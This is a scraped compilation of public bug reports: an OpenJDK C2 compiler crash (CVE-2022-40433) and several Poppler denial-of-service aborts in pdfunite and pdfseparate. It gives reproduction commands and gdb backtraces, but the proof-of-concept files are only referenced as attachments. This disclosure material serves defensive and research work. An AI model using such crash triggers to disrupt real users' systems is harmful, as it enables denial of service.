\# Java VM: OpenJDK 64-Bit Server VM (17.0.2+8-86, compiled mode, sharing, tiered, compressed oops, compressed class ptrs, g1 gc, linux-amd64)  
\# Problematic frame:  
\# V \[libjvm.so+0x52837b\] ciMethodBlocks::make\_block\_at(int)+0x3b  
#  
\# No core dump will be written. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again  
#  
\# An error report file with more information is saved as:  
\# /home/minghai/hs\_err\_pid32365.log  
#  
\# Compiler replay data is saved as:  
\# /home/minghai/replay\_pid32365.log  
#  
\# If you would like to submit a bug report, please visit:  
\# https://bugreport.java.com/bugreport/crash.jsp

jdk18:  
\# A fatal error has been detected by the Java Runtime Environment:  
#  
\# SIGSEGV (0xb) at pc=0x00007f9a003d800b, pid=32250, tid=32263  
#  
\# JRE version: OpenJDK Runtime Environment (18.0+36) (build 18+36-2087)  
\# Java VM: OpenJDK 64-Bit Server VM (18+36-2087, compiled mode, sharing, tiered, compressed oops, compressed class ptrs, g1 gc, linux-amd64)  
\# Problematic frame:  
\# V \[libjvm.so+0x54b00b\] ciTypeFlow::get\_block\_for(int, ciTypeFlow::JsrSet\*, ciTypeFlow::CreateOption)+0x2b  
#  
\# No core dump will be written. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again  
#  
\# An error report file with more information is saved as:  
\# /home/minghai/hs\_err\_pid32250.log  
#  
\# Compiler replay data is saved as:  
\# /home/minghai/replay\_pid32250.log  
#  
\# If you would like to submit a bug report, please visit:  
\# https://bugreport.java.com/bugreport/crash.jsp

jdk19-ea:  
\# A fatal error has been detected by the Java Runtime Environment:  
#  
\# SIGSEGV (0xb) at pc=0x00007f96f291b1fb, pid=32319, tid=32332  
#  
\# JRE version: OpenJDK Runtime Environment (19.0+13) (build 19-ea+13-808)  
\# Java VM: OpenJDK 64-Bit Server VM (19-ea+13-808, compiled mode, sharing, tiered, compressed oops, compressed class ptrs, g1 gc, linux-amd64)  
\# Problematic frame:  
\# V \[libjvm.so+0x5571fb\] ciTypeFlow::get\_block\_for(int, ciTypeFlow::JsrSet\*, ciTypeFlow::CreateOption)+0x2b  
#  
\# No core dump will be written. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again  
#  
\# An error report file with more information is saved as:  
\# /home/minghai/hs\_err\_pid32319.log  
#  
\# Compiler replay data is saved as:  
\# /home/minghai/replay\_pid32319.log  
#  
\# If you would like to submit a bug report, please visit:  
\# https://bugreport.java.com/bugreport/crash.jsp

STEPS TO FOLLOW TO REPRODUCE THE PROBLEM :  
1\. extract the bug.zip  
2\. in dictionary "bug", run command:  
java -cp ./bugFiles:./util:./junit.jar:./hamcrest.jar:./target/classes:./target/test-classes org.junit.runner.JUnitCore com.alibaba.fastjson.deserializer.issue1463.TestIssue1463

you may add "-Xcomp" or "-Xint" to get different results.

EXPECTED VERSUS ACTUAL BEHAVIOR :  
EXPECTED -  
The result should be the same since the program are the same, no matter in compiled mode, mixed mode or interpreted mode.  
ACTUAL -  
When run in compiled mode(with "-Xcomp"), it crashed. But when run in mixed mode or interpreted mode(with -Xint), it passed successfully.

\---------- BEGIN SOURCE ----------  
to be attached in bug.zip  
\---------- END SOURCE ----------

CUSTOMER SUBMITTED WORKAROUND :  
run the command without -Xcomp or with -Xint

FREQUENCY : always

CVE-2022-40433: C2: segmentation fault in ciMethodBlocks::make_block_at(int)

An issue was discovered in Poppler 22.07.0. There is a reachable abort which leads to denial of service because the main function in pdfunite.cc lacks a stream check before saving an embedded file.

When testing #706 (closed), we found the bug is not completely patched in pdfunite. To reproduce the bug, run pdfunite t.pdf poc 2.pdf.

    (gdb) bt
    #0  0x00007ffff72467bb in raise () from /lib/x86_64-linux-gnu/libc.so.6
    #1  0x00007ffff7231535 in abort () from /lib/x86_64-linux-gnu/libc.so.6
    #2  0x000000000040d7a1 in Object::getDict (this=<optimized out>)
        at /home/users/chluo/poppler/poppler/Object.h:435
    #3  main (argc=<optimized out>, argv=<optimized out>)
        at /home/users/chluo/poppler/utils/pdfunite.cc:200

uni.zip

Edited Jul 28, 2022 by

CVE-2022-37051: SIGABRT at poppler/Object.h:435 (pdfunite) (#1276) · Issues · poppler / poppler · GitLab

In Poppler 22.07.0, PDFDoc::savePageAs in PDFDoc.c callows attackers to cause a denial-of-service (application crashes with SIGABRT) by crafting a PDF file in which the xref data structure is mishandled in getCatalog processing. Note that this vulnerability is caused by the incomplete patch of CVE-2018-20662.

Hi, we found a bug in the latest version of poppler (commit b9643712), the bug causes the program to crash with the following backtrace.

To reproduce it, run pdfseparate poc 1.pdf

    (gdb) bt
    #0  0x00007ffff72467bb in raise () from /lib/x86_64-linux-gnu/libc.so.6
    #1  0x00007ffff7231535 in abort () from /lib/x86_64-linux-gnu/libc.so.6
    #2  0x00007ffff7bee76f in Object::getDict (this=<optimized out>)
        at /home/users/chluo/poppler/poppler/Object.h:435
    #3  PDFDoc::savePageAs (this=0x466e10, name=..., pageNo=1)
        at /home/users/chluo/poppler/poppler/PDFDoc.cc:889
    #4  0x0000000000408659 in extractPages (srcFileName=<optimized out>,
        destFileName=0x7fffffffe6eb "./1.pdf")
        at /home/users/chluo/poppler/utils/pdfseparate.cc:123
    #5  main (argc=<optimized out>, argv=<optimized out>)
        at /home/users/chluo/poppler/utils/pdfseparate.cc:156

sep.zip

Seems that this bug is related to #706 (closed). 7b4e372d partially fixes #706 (closed) yet it is incomplete.

Edited Jul 27, 2022 by

CVE-2022-37050: SIGABRT at poppler/Object.h:435 (#1274) · Issues · poppler / poppler · GitLab

An issue was discovered in Poppler 22.08.0. There is a reachable assertion in Object.h, will lead to denial of service because PDFDoc::replacePageDict in PDFDoc.cc lacks a stream check before saving an embedded file.

Hi, we found a bug in poppler/PDFDoc.cc:1755. When the bug is triggered, the program would crash with the following backtrace.

To reproduce, run pdfunite t.pdf poc 2.pdf

    (gdb) bt
    #0  0x00007ffff745f8c1 in raise () from /lib/x86_64-linux-gnu/libc.so.6
    #1  0x00007ffff7449546 in abort () from /lib/x86_64-linux-gnu/libc.so.6
    #2  0x00007ffff7a5eb18 in Object::getDict (this=0x7fffffffe0c8)
        at /home/users/chluo/pop/poppler/Object.h:435
    #3  PDFDoc::replacePageDict (this=0x5555555bb430, pageNo=<optimized out>,
        rotate=90, mediaBox=0x5555555e3b50, cropBox=0x5555555e3b70)
        at /home/users/chluo/pop/poppler/PDFDoc.cc:1755
    #4  0x000055555555c9fa in main (argc=<optimized out>, argv=<optimized out>)
        at /home/users/chluo/pop/utils/pdfunite.cc:290

The bug is relevant to #706 (closed) and #1276 (closed).

poc.zip

Tag

#linux